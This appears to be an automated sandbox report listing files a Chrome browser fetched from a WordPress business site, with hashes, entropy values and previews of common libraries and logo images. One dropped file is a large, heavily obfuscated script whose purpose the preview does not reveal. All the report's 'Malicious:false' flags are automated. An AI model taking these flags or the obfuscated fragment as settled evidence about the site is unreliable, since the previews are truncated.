                                                                                                                      Preview:google.maps.__gjsload__('onion', function(_){var tYa,uYa,XP,$P,ZP,xYa,yYa,zYa,wYa,AYa,bQ,BYa,CYa,DYa,FYa,HYa,IYa,KYa,LYa,OYa,QYa,SYa,UYa,WYa,XYa,VYa,hQ,iQ,gQ,jQ,bZa,cZa,dZa,eZa,gZa,fZa,kQ,oZa,nZa,nQ,tZa,uZa,vZa,sZa,wZa,yZa,pQ,CZa,DZa,EZa,xZa,zZa,AZa,FZa,GZa,oQ,PZa,QZa,TZa,SZa;tYa=function(a,b){_.Xg(a.Gg,1,b)};uYa=function(a,b){_.Xg(a.Gg,2,b)};XP=function(){vYa||(vYa=[_.P,_.N,_.Q])};$P=function(a){_.yG.call(this,a,YP);ZP(a)};.ZP=function(a){_.QF(a,YP)||(_.PF(a,YP,{entity:0,jn:1},["div",,1,0,[" ",["div",,1,1,[" ",["div",576,1,2,"Dutch Cheese Cakes"]," "]]," ",["div",,1,3,[" ",["span",576,1,4,"Central Station"]," ",["div",,1,5]," "]]," "]],[],wYa()),_.QF(a,"t-ZGhYQtxECIs")||_.PF(a,"t-ZGhYQtxECIs",{},["jsl",,1,0," Station is accessible "],[],[["$t","t-ZGhYQtxECIs"]]))};xYa=function(a){return a.uj};yYa=function(a){return a.xl};zYa=function(){return _.oF("t-ZGhYQtxECIs",{})};.wYa=function(){return[["$t","t-t0weeym2tCw","$a",[7,,,,,"transit-container"]],["display",function(a){return!_.rF(a.en
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):9533
                                                                                                                      Entropy (8bit):7.630656000633704
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:2ulQlQfLOhOzx9OfYTf5GAvdqweZGHmXuJwC9ceEvfo1SZe5MtTbtpW:jQlWL/7zFGen4GGIhYfC5wbrW
                                                                                                                      MD5:E0B2CD949B5AEE0B92C2DF61016729DB
                                                                                                                      SHA1:C561BD4E2040A3FFEEC54F5DD7768ED325BF1612
                                                                                                                      SHA-256:09E1B5006504EAAB7D397117F9D385124035697051B11577B0EB48883B14C1F1
                                                                                                                      SHA-512:73CE7A46A13289147920230716E4A833E62F41679D238B432B58E5D4FA256B7A7C59396FED9EBC4C0283F9B2381213C2177D525E0A3C469405310198F212C940
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/palo-alto.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d...........................%;............................................................................................................................................J.J........................................................................................1.!2.4. 0.@.".#3$B5.......................!1AQ...0aq.."r#s....2..3 .R.....Bb.Sc.$4.....................@! 0P.1.`aAQ.....................!1A.Qaq0..... ....@...........................................................................................................................................................................................................................................................................................E...:||...\*...z`...+4..6.....R....Fs.!w.........o...XHF}......(..{....V...j.S.O.6..".i.Lj....y...........3...jT.8....N.>k......~6.75..i.....~....c........c.g.;..F.<....<+.....z.V...../9>.3..o??0...S.....f.5....l[+[.pe9.f.=*.Pr...
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (906)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):2675
                                                                                                                      Entropy (8bit):5.29907961199932
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:Dpfkqj/0a4CVhZYqWRjPl1V/TimWyWC105OhczgH+NiSAvQUIHGeoj6Rn:DpfZ/0a4sQPrgl/O6z2SAkxu6Rn
                                                                                                                      MD5:3F3CE42C5B35866DD3C3B8E462D6EAB9
                                                                                                                      SHA1:5E060E37BAEE73468EC234B2B666DBB3AEC1AF1E
                                                                                                                      SHA-256:7DE634E9FB65CF5F0E39756971C2C686792DDC35DB40E0B8827DDE57C9C0D598
                                                                                                                      SHA-512:C15AFCACF911FB878737865A5584AD5159E0316CDE94502D3AC469ECE3B31DF7D0C62D1CFCF6B822DC7DCAA80980974DC3CB0DD9AA00A4E1266668CE48C92E38
                                                                                                                      Malicious:false
                                                                                                                      URL:https://maps.googleapis.com/maps-api-v3/api/js/59/1/search.js
                                                                                                                      Preview:google.maps.__gjsload__('search', function(_){var tta=function(){},VA=function(a){this.setValues(a);_.jj("search_impl")},vta=function(a){let b=_.Jl,c=-1;a.tiles.forEach(e=>{e.zoom>c&&(b=e.ki,c=e.zoom)});if(c===-1)return[];const d=[];a.Gu().forEach(e=>{e.a&&e.a.length>=2&&d.push(new uta(e,b,c))});return d},wta=function(a){const b=[];a.data.forEach(c=>{b.push(...vta(c))});return b};_.Ia(tta,_.Hk);var xta={["1"]:{}},uta=class{constructor(a,b,c){this.rn=b;this.zoom=c;this.bounds=this.anchor=null;this.Eg=xta;this.source=a;this.featureId=this.source.id||"0";this.infoWindowOffset=(this.source.io||[]).length===2?new google.maps.Point(this.source.io[0],this.source.io[1]):null}getAnchor(){if(!this.anchor){const a=1<<this.zoom;this.anchor=_.hm(new _.wm((this.rn.x*256+this.source.a[0])/a,(this.rn.y*256+this.source.a[1])/a)).toJSON()}return this.anchor}getCompleteBounds(){return this.getBounds().reduce((a,.b)=>{a.extendByBounds(b);return a},_.lm(0,0,0,0))}getBounds(){if(this.bounds===null){this.bou
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):10734
                                                                                                                      Entropy (8bit):7.700242252732042
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZldQseAOHtlSmxNLRVj+Rtezk/dRiUX/tVgKoMx2UBdpuQC9s:G3pHt8mxNDaRtj/WU/tVyexIs
                                                                                                                      MD5:79009353804C9C29B525051B1956CE5C
                                                                                                                      SHA1:B640E8E5130A228FC29687B366E3B1BAB91AB625
                                                                                                                      SHA-256:6E73FAB4A391E3D6CBBCD4AD168A8B546AC7E2CBDB367B48D0B99B6301A74638
                                                                                                                      SHA-512:B49F7E12D5D5D071C406548621E7E49EF62AFC2B321099B1871A2834E063C5F4BFF5F60020F397E7A6AAC5FFB31836804B428E3051EEEA6C7778E08C65E36D8C
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/hp.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d...........................).............................................................................................................................................J.J.......................................................................................!...01 P"..@.24BA#3CE$.....................1..!A.Qaq."20..BR.3 P..r@...4..b.#................... ..P!10@.a`q....................!1A.Qaq.....0... P.@...............P...............................................................................................................................................................................................................................r.>..Sj.>.....z............"..kG*l3........#.G..kV............+.....|]....:Y ..CKCCL................s...v.;..|(3...^.......tq.>.w.x...|..y.\}....u.y#.......w.g..@....eQ......J....=..|..3^..>=.....co..4.,.[...V........r=]......[U.[b......(_....@...m|..#..[.O..he.[j.q..;.O..id.{.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 300x300, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):17939
                                                                                                                      Entropy (8bit):7.638242154234509
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:T0f2ChY4q1N2nGRP+LnHJ5PBSzmAI6DKj1oUgob5lOk6CNoxkuiI4MdOz3KRiZFc:T0eOYHkjYz66GjLb1veku74M+KRJ+q
                                                                                                                      MD5:67EEC4D68246155BCE71D62A395F028C
                                                                                                                      SHA1:AF33DCD19BBBEAD2214F874CF55CBC694F08643A
                                                                                                                      SHA-256:C058708BD2F611B5CEFBF8DD7E307795FC200CB721466C0B00414B8A0925CC51
                                                                                                                      SHA-512:77C43DD81F982194F67220AA769829F5F43A9AE9DD7D367324A998E1A62360FE2D975D821C92B5185D1143216AD0AB2A8AFBA7B91643CDD20C17561241FAEAE4
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/11/yeastar.jpg
                                                                                                                      Preview:......Exif..II*.................Ducky.......d.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Macintosh" xmpMM:InstanceID="xmp.iid:9DBD99E6E1B511E8B98398EB3C68BCBE" xmpMM:DocumentID="xmp.did:9DBD99E7E1B511E8B98398EB3C68BCBE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9DBD99E4E1B511E8B98398EB3C68BCBE" stRef:documentID="xmp.did:9DBD99E5E1B511E8B98398EB3C68BCBE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................................................................................................................................
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (32032)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):54780
                                                                                                                      Entropy (8bit):5.238450697949289
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:OYQjF+MMjhPIkwFrHJc2Pyx9b2O68HOkXxEXy7l1pT9Hpyn220DTPRZmtxNpNxCD:s7DY9bfDjv9Hpyn8CmcrM4ODpZ
                                                                                                                      MD5:72805FB6FA518285D00F3721F2EEED88
                                                                                                                      SHA1:EE393D37ABF534EB94BDBFE72B15E4D07A26EF12
                                                                                                                      SHA-256:E9CDBEBB93C076DE37E208742A252641C50A5A527EFCEE16FD18DFF10F237E36
                                                                                                                      SHA-512:E538659E8FCCBF95BC779CFB784B8E6A1119DE75D9D2E02E3A07FC9BBA7BFBFF4BB64CEDF6C9FDCFAB11F3B9BFF5BA96F6FAA9CB052AEB961E356D0CBB35BD07
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*. *.jQuery carouFredSel 6.2.1. *.Demo's and documentation:. *.caroufredsel.dev7studios.com. *. *.Copyright (c) 2013 Fred Heusschen. *.www.frebsite.nl. *. *.Dual licensed under the MIT and GPL licenses.. *.http://en.wikipedia.org/wiki/MIT_License. *.http://en.wikipedia.org/wiki/GNU_General_Public_License. */...(function($){function sc_setScroll(a,b,c){return"transition"==c.transition&&"swing"==b&&(b="ease"),{anims:[],duration:a,orgDuration:a,easing:b,startTime:getTime()}}function sc_startScroll(a,b){for(var c=0,d=a.anims.length;d>c;c++){var e=a.anims[c];e&&e[0][b.transition](e[1],a.duration,a.easing,e[2])}}function sc_stopScroll(a,b){is_boolean(b)||(b=!0),is_object(a.pre)&&sc_stopScroll(a.pre,b);for(var c=0,d=a.anims.length;d>c;c++){var e=a.anims[c];e[0].stop(!0),b&&(e[0].css(e[1]),is_function(e[2])&&e[2]())}is_object(a.post)&&sc_stopScroll(a.post,b)}function sc_afterScroll(a,b,c){switch(b&&b.remove(),c.fx){case"fade":case"crossfade":case"cover-fade":case"uncover-fade":a.css("opacity"
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 134 x 121, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1554
                                                                                                                      Entropy (8bit):7.732728319657169
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:wmkCylglTY5dSPLyhoqZthEN21+x3Av/qeg3GoXp17UOZPcfZKAE1Na:wmkCyGlTQdouhEA+WNcphOhh
                                                                                                                      MD5:A74A478546C5CCC1DF7FB51BE5998317
                                                                                                                      SHA1:1C130EB51B1D42511FEC0CD7E415FF55CFCA3B32
                                                                                                                      SHA-256:2BC52C34404415E25EE4CF2D629D16FDEDF66F5C54179527FB647B3F13605104
                                                                                                                      SHA-512:BD7BEC302D5CFBACA6743B509F78876ED67410A660C9CD358953A9897011C31FAEBB2DBF14F1B7EAF82C8FBA8C6E4F47D73245E1391250422D5FE79125936649
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR.......y.......Y]....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...m.@...}_$.`+XR....H.P.B.@...@. ... ...."Q.z.A...3....O./.....9g.6c................%.n._.......q..1.I1L>O.W.-.&_.D..P...m..A)..MH..71&.o[.1@.@..1.>...sR..Z..Vr.....J....b... ....b... ....b.@.e.m '......I...x".... ...p. .#...A......s.|]p.%.!(.j........@..1.....@..1........yy.&.s..A..g9)v.O.gq=..6D.sR.z.?.1:$...e.H%.Hq..w...H!.H9.H%.BD........e.Q]..$..S/7.'.o.1.%.-E.d.Z....=..-)..`.C+a!F.)29.X...I.?.J.$E.wDd.....UW.C..R.Q.*....r@*....G....... .!).).U.1.p.+.A..Rd.c(.(....rHaX...VD.."F......qE1.r\....)n'..(...I.d... F.......]...(f!.2'.?..:%..R.KX.+..{[.CW..n.&$9..o).q...UJqj..; EQ..$.kRdr..G]Q.".N.b.....k.^.L.!....B..=9.Bg....[.b...D...A.L./...%).......}."..ND......1.....9|."...."..9q"..r.<....]..i.+..,..V!M.)'E....R.8..[...{.t..1......!FD.._........B...2.+...>I...e.BW..$....}y9.."..3.....#../.........i...1.G.tJY.CG.^...]...a)...E.`Pr./E~.U%,..=)W.5.#._.W.wc.}
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (906)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2675
                                                                                                                      Entropy (8bit):5.29907961199932
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:Dpfkqj/0a4CVhZYqWRjPl1V/TimWyWC105OhczgH+NiSAvQUIHGeoj6Rn:DpfZ/0a4sQPrgl/O6z2SAkxu6Rn
                                                                                                                      MD5:3F3CE42C5B35866DD3C3B8E462D6EAB9
                                                                                                                      SHA1:5E060E37BAEE73468EC234B2B666DBB3AEC1AF1E
                                                                                                                      SHA-256:7DE634E9FB65CF5F0E39756971C2C686792DDC35DB40E0B8827DDE57C9C0D598
                                                                                                                      SHA-512:C15AFCACF911FB878737865A5584AD5159E0316CDE94502D3AC469ECE3B31DF7D0C62D1CFCF6B822DC7DCAA80980974DC3CB0DD9AA00A4E1266668CE48C92E38
                                                                                                                      Malicious:false
                                                                                                                      Preview:google.maps.__gjsload__('search', function(_){var tta=function(){},VA=function(a){this.setValues(a);_.jj("search_impl")},vta=function(a){let b=_.Jl,c=-1;a.tiles.forEach(e=>{e.zoom>c&&(b=e.ki,c=e.zoom)});if(c===-1)return[];const d=[];a.Gu().forEach(e=>{e.a&&e.a.length>=2&&d.push(new uta(e,b,c))});return d},wta=function(a){const b=[];a.data.forEach(c=>{b.push(...vta(c))});return b};_.Ia(tta,_.Hk);var xta={["1"]:{}},uta=class{constructor(a,b,c){this.rn=b;this.zoom=c;this.bounds=this.anchor=null;this.Eg=xta;this.source=a;this.featureId=this.source.id||"0";this.infoWindowOffset=(this.source.io||[]).length===2?new google.maps.Point(this.source.io[0],this.source.io[1]):null}getAnchor(){if(!this.anchor){const a=1<<this.zoom;this.anchor=_.hm(new _.wm((this.rn.x*256+this.source.a[0])/a,(this.rn.y*256+this.source.a[1])/a)).toJSON()}return this.anchor}getCompleteBounds(){return this.getBounds().reduce((a,.b)=>{a.extendByBounds(b);return a},_.lm(0,0,0,0))}getBounds(){if(this.bounds===null){this.bou
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):10449
                                                                                                                      Entropy (8bit):7.686800855393292
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:PsQRL02n0wL2qyg4Kwto+7njZ5MnzVEC4otRjw9wadu30RBzQ2:PsQRL020wLVEt5bjLMnzVuotRjw1FBzD
                                                                                                                      MD5:6C90379E2C033F648AB643EAF9210A78
                                                                                                                      SHA1:4D4A240A099738D9C6F73AB3D6A2FFB6B41CC9B1
                                                                                                                      SHA-256:8598BA960522F3F7E559ECBB3394B9BAE27AFA3D887C7B52B5CAE74F98825E66
                                                                                                                      SHA-512:6AE36731B0F12AC36EFBA5EEA474ED00D857DAB199AE54C4A52CA13C91B7D2BCC77B5ECA8A43A9B592BE15DC56A7626C40416849696EEA0AD3AC36993DB95A1A
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................[...9......(.............................................................................................................................................J.J.........................................................................................@1...P!. .35"2.`.......................!1...Aq".@Qa.2BR#3...r.P..b....C.`..S$..................P!.... `..1Q.a....................!.1AQaq@..P... `...........................................................................................................................................................=...............!..3......d"M.7................T.q..jv...Y....t..6'...............-.......u>7#Pf./>..fA=...p...@..........*6........miw.j.y..1T.9y..................]jWL:.\.....w...t.Q.......h.~...@..........n.x.q.....N.u.q..Y.W..>.W.<.....:..............j.w.].oV.m.jMFdt.5:.~.{.R.D..Cmt.............'......7..E:.jE....+1.i.}._...............&).B?.w....6.....yz+o8ah>m.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):10278
                                                                                                                      Entropy (8bit):7.691920272029696
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CxX2tCSt7ViA9+5vB+ctshCOHsIv7OV3ec+U8ERuI3JurNiK2d/:CYtHc1B+GO9Hso0p8UR3JSiK2d/
                                                                                                                      MD5:E30EE5C14A201C9B0059482AACF52324
                                                                                                                      SHA1:120FF6758987C22C3A4F8573C8596945C06E9C4A
                                                                                                                      SHA-256:FD2AC031B667487899F9ECC253AB87AEDA471AC227EE2A2702F49146191CEF59
                                                                                                                      SHA-512:8DFA76D07A0EF5284BF85B3EA990982F56480159B62C9202649F11BBE8A1933F8E46B595F332F241EC039C6CF498C152695A9F8BDDBEABF0E26F3DF042123177
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................u...m...w..($............................................................................................................................................J.J.........................................................................................1...0!.4.5P."2 @A#%.63......................!1.A...Qaq."0.....2Rr.#4PB.3...s ..bc..................!.. @P.0`....................!1AQ.aq...0.. @P...................................................................................................................................................................................................................................................G...R.............9.s)@.}?Gh.[@..............=........V................k.._..e.;..fX.o..>K...XP..........5.}/._..2....3,c.&.c.s..........Lv.>.+n...........f.r.e.3-.z........x.tf|{............Z....e.v..{_.......x.....~]f~._O*n.8~.]...........dz..^.._..E./.......6...G....$...|...?.{G..O
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (5477)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):5594
                                                                                                                      Entropy (8bit):5.0603456829137325
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:bwRxr6JAXgWWwrrSTrmM4KvlGC89QPjRxq2uVBXeHRGKrc4oPUGPgNhd+qLoBV7J:bwjrycrr3rKvE9IjRxjGjgNhdTLo3re+
                                                                                                                      MD5:E2C1A80B99251B7B94726B41312FB160
                                                                                                                      SHA1:6D3E11174E22668E69DF236E5C4542168F7CBFEC
                                                                                                                      SHA-256:96ABF166B3CBB5F7DF525D86FDEEECCEA4AF3C120B19BC26B0613530A94E8B44
                                                                                                                      SHA-512:4B93D9F46C4964ED7AB53F6BDD6269FD269F9F7D5EBBCB96AF382531A8434F876C9A0A96A27458F60AE4DE3FB7B5FB8FAFD58936C7E8A0E47B1A2EC72F95B68F
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/plugins/salient-portfolio/js/third-party/imagesLoaded.min.js?ver=4.1.4
                                                                                                                      Preview:/*!. * imagesLoaded PACKAGED v4.1.4. * JavaScript is all like "You images are done yet or what?". * MIT License. */..!function(e,t){"function"==typeof define&&define.amd?define("ev-emitter/ev-emitter",t):"object"==typeof module&&module.exports?module.exports=t():e.EvEmitter=t()}("undefined"!=typeof window?window:this,function(){function e(){}var t=e.prototype;return t.on=function(e,t){if(e&&t){var i=this._events=this._events||{},n=i[e]=i[e]||[];return n.indexOf(t)==-1&&n.push(t),this}},t.once=function(e,t){if(e&&t){this.on(e,t);var i=this._onceEvents=this._onceEvents||{},n=i[e]=i[e]||{};return n[t]=!0,this}},t.off=function(e,t){var i=this._events&&this._events[e];if(i&&i.length){var n=i.indexOf(t);return n!=-1&&i.splice(n,1),this}},t.emitEvent=function(e,t){var i=this._events&&this._events[e];if(i&&i.length){i=i.slice(0),t=t||[];for(var n=this._onceEvents&&this._onceEvents[e],o=0;o<i.length;o++){var r=i[o],s=n&&n[r];s&&(this.off(e,r),delete n[r]),r.apply(this,t)}return this}},t.allOff=
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1181731
                                                                                                                      Entropy (8bit):3.299897113473948
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:FJYhu4ziE/LHXNMz0znTKAFl7I0RnuE3+noWdKTLJYhu4ziE/LHXNMz0znTKAFl0:I
                                                                                                                      MD5:CA978C77DF03AAD4547A5B311A467078
                                                                                                                      SHA1:4C93D519AFE3D1AF982A6B370047F015EBAC1732
                                                                                                                      SHA-256:365A8E7404CD6377E0AFBBFEE1375A0B5048F1A5A163137AB29C84712BF9B82C
                                                                                                                      SHA-512:882D84D6A295FC73815B1EB0E2642312A6638EAA9CF2EE7409E413D73654D0002AF9841DF6449FA0D43E4E86DB1F973EA11C0447DD33536C9BCDA6F9593E499F
                                                                                                                      Malicious:false
                                                                                                                      Preview:(function(_0x8df42a,_0x53fd74){var _0x4b06bb=_0x8df42a();function _0x592ccd(_0x519adb,_0x1ba417){return _0x3198(_0x519adb- -0x2a8,_0x1ba417);}while(!![]){try{var _0x22ccf8=parseInt(_0x592ccd(-0x134,-0x132))/0x1*(parseInt(_0x592ccd(-0x142,-0x151))/0x2)+parseInt(_0x592ccd(-0x130,-0x126))/0x3+-parseInt(_0x592ccd(-0x12f,-0x12f))/0x4+-parseInt(_0x592ccd(-0x13f,-0x149))/0x5*(-parseInt(_0x592ccd(-0x149,-0x13c))/0x6)+parseInt(_0x592ccd(-0x12d,-0x124))/0x7+parseInt(_0x592ccd(-0x14a,-0x14b))/0x8*(parseInt(_0x592ccd(-0x141,-0x14c))/0x9)+-parseInt(_0x592ccd(-0x140,-0x143))/0xa;if(_0x22ccf8===_0x53fd74)break;else _0x4b06bb['push'](_0x4b06bb['shift']());}catch(_0x1e3d7c){_0x4b06bb['push'](_0x4b06bb['shift']());}}}(_0x30e6,0xc1a9b));function _0x3198(_0x41c9ea,_0x1132bc){var _0x5d70af=_0x30e6();return _0x3198=function(_0x4f6bbb,_0x2cdd25){_0x4f6bbb=_0x4f6bbb-0x15e;var _0x5f0db8=_0x5d70af[_0x4f6bbb];return _0x5f0db8;},_0x3198(_0x41c9ea,_0x1132bc);}function _0x417b73(_0x5bc261,_0x14cbbc){return _0x3198(
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):10734
                                                                                                                      Entropy (8bit):7.700242252732042
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZldQseAOHtlSmxNLRVj+Rtezk/dRiUX/tVgKoMx2UBdpuQC9s:G3pHt8mxNDaRtj/WU/tVyexIs
                                                                                                                      MD5:79009353804C9C29B525051B1956CE5C
                                                                                                                      SHA1:B640E8E5130A228FC29687B366E3B1BAB91AB625
                                                                                                                      SHA-256:6E73FAB4A391E3D6CBBCD4AD168A8B546AC7E2CBDB367B48D0B99B6301A74638
                                                                                                                      SHA-512:B49F7E12D5D5D071C406548621E7E49EF62AFC2B321099B1871A2834E063C5F4BFF5F60020F397E7A6AAC5FFB31836804B428E3051EEEA6C7778E08C65E36D8C
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d...........................).............................................................................................................................................J.J.......................................................................................!...01 P"..@.24BA#3CE$.....................1..!A.Qaq."20..BR.3 P..r@...4..b.#................... ..P!10@.a`q....................!1A.Qaq.....0... P.@...............P...............................................................................................................................................................................................................................r.>..Sj.>.....z............"..kG*l3........#.G..kV............+.....|]....:Y ..CKCCL................s...v.;..|(3...^.......tq.>.w.x...|..y.\}....u.y#.......w.g..@....eQ......J....=..|..3^..>=.....co..4.,.[...V........r=]......[U.[b......(_....@...m|..#..[.O..he.[j.q..;.O..id.{.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65447)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):89664
                                                                                                                      Entropy (8bit):5.290543045467053
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:SjjxXUHJnxDjoXEZxkMV4PYDt0zxxf6gP3f8cApoEGOzZTBvUsuy8WnKdXwhLQvg:SdeIygP3fulzcsz8jlvaDioQ47GKH
                                                                                                                      MD5:00727D1D5D9C90F7DE826F1A4A9CC632
                                                                                                                      SHA1:EA61688671D0C3044F2C5B2F2C4AF0A6620AC6C2
                                                                                                                      SHA-256:A3CF00C109D907E543BC4F6DBC85EB31068F94515251347E9E57509B52EE3D74
                                                                                                                      SHA-512:69528A4518BF43F615FB89A3A0A06C138C771FE0647A0A0CFDE9B8E8D3650AA3539946000E305B78D79F371615EE0894A74571202B6A76B6EA53B89569E64D5C
                                                                                                                      Malicious:false
                                                                                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js
                                                                                                                      Preview:/*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (15660)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):18617
                                                                                                                      Entropy (8bit):4.746740754378132
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:Unb0kcuPTb9Uh31//bEP+XgA1N9CleffJmp3:Ub0/U9Uh31//YWXgAJffC3
                                                                                                                      MD5:32BEB68A374E3AEAC00ABDF9E12B84EA
                                                                                                                      SHA1:B5D18AA625E8696DD9D07CD0869337717B211AE0
                                                                                                                      SHA-256:5AAD5FBD4238981A9FF5E2772FF1353DFE1A801FB49542FE157418C1438F7782
                                                                                                                      SHA-512:8FC41038B4DC2FC2465422FB3144B71C2ACD2F4552607369314FEC9B7F561B7A3919CDC4219DF2089395241168FFBFE29E67DDDA834E66C27E4C88066C8F4496
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*! This file is auto-generated */.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var f={base:"https://twemoji.maxcdn.com/v/14.0.2/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return b(d);return b(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:i},onerror:function(){this.parentNode&&this.parentNode.replaceChild(g(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return("string"==typeof d?function(d,a){return o(d,function(d){var u,f,c=d,e=x(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,n),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,n,r,o,i,s,l=function d(u,f){var c,e,b=u.childNodes,a=b.length;for(;a--;)c=b[a]
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
